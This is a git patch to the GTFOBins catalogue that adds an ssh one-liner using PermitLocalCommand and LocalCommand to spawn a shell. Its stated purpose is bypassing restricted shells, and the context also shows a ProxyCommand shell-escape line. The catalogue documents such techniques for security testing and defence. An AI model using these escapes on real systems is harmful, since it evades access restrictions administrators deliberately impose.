From cd05b58e706b06ea459201417ba6149afc5417cf Mon Sep 17 00:00:00 2001
From: James Spadaro <jimspadaro@gmail.com>
Date: Sun, 1 May 2022 05:07:53 -0400
Subject: [PATCH] Add LocalCommand option to SSH

SSH has a LocalCommand option that will run a given command on the client machine after a successful connection.  It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes".  This is useful for bypassing restricted shells.

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/ssh.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index cc689e2..6f2a1f5 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -5,6 +5,8 @@ functions:
       code: ssh localhost $SHELL --noprofile --norc
     - description: Spawn interactive shell through ProxyCommand option.
       code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
+    - description: Spawn interactive shell on client, requires a successful connection towards `host`.
+      code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
   file-upload:
     - description: Send local file to a SSH server.
       code: |